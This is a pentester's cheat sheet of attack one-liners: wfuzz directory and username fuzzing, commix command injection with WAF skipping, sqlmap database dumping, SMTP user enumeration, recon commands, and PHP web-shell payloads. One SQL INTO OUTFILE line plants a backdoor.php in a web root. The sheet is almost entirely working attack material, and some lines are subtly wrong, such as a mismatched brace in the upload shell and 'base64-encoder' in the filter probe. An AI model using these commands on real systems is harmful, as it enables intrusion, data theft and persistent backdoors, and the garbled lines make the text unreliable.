===AUTHENTICATED FUZZING DIRECTORIES:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "PARAM=value" "$URL"

===AUTHENTICATED FILE FUZZING:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "PARAM=value" "$URL"

===FUZZ DIRECTORIES:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "$URL"

===FUZZ FILES:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 "$URL"

===LARGE WORDS:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL"

USERS:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/top-usernames-shortlist.txt --hc 404,403 "$URL"

===================================================================

===COMMAND INJECTION WITH COMMIX, SSL, WAF, RANDOM AGENT
commix --url="https://supermegaleeeturltradomain.com?parameter=" --level=3 --force-ssl --skip-waf --random-agent

===================================================================

===SQLMAP
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force=ssl
sqlmap -u $URL --threads=3 --time-sec= 10 --level=4 --risk=3 --dump /SecLists/Fuzzing/alphanum-case.txt

===================================================================

===SOCIAL RECON
theharvester -d domain.org -l 500 -b google

===================================================================

===NMAP HTTP-METHODS
nmap -p80,443 --script=http-methods <ip> --scripts-args http-methods.url-path='/directory/goes/here'

===================================================================

===SMTP USER ENUMERATION
smtp-user-enum /M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum /M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum /M RCPT -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum /M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP

===================================================================

===COMMAND EXECUTION VERIFICATION - [PING CHECK]
tcpdump -i eth0 -c5 icmp

===CHECK NETWORK
netdiscover /r 0.0.0.0/24

===INTO OUTFILE DOOR
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/WEBROOT/backdoor.php";

===PHP FILTER CHECKS
php://filter/convert.base64-encoder/resource=

===UPLOAD IMAGE
<?php system{$_POST["cmd"]); ?>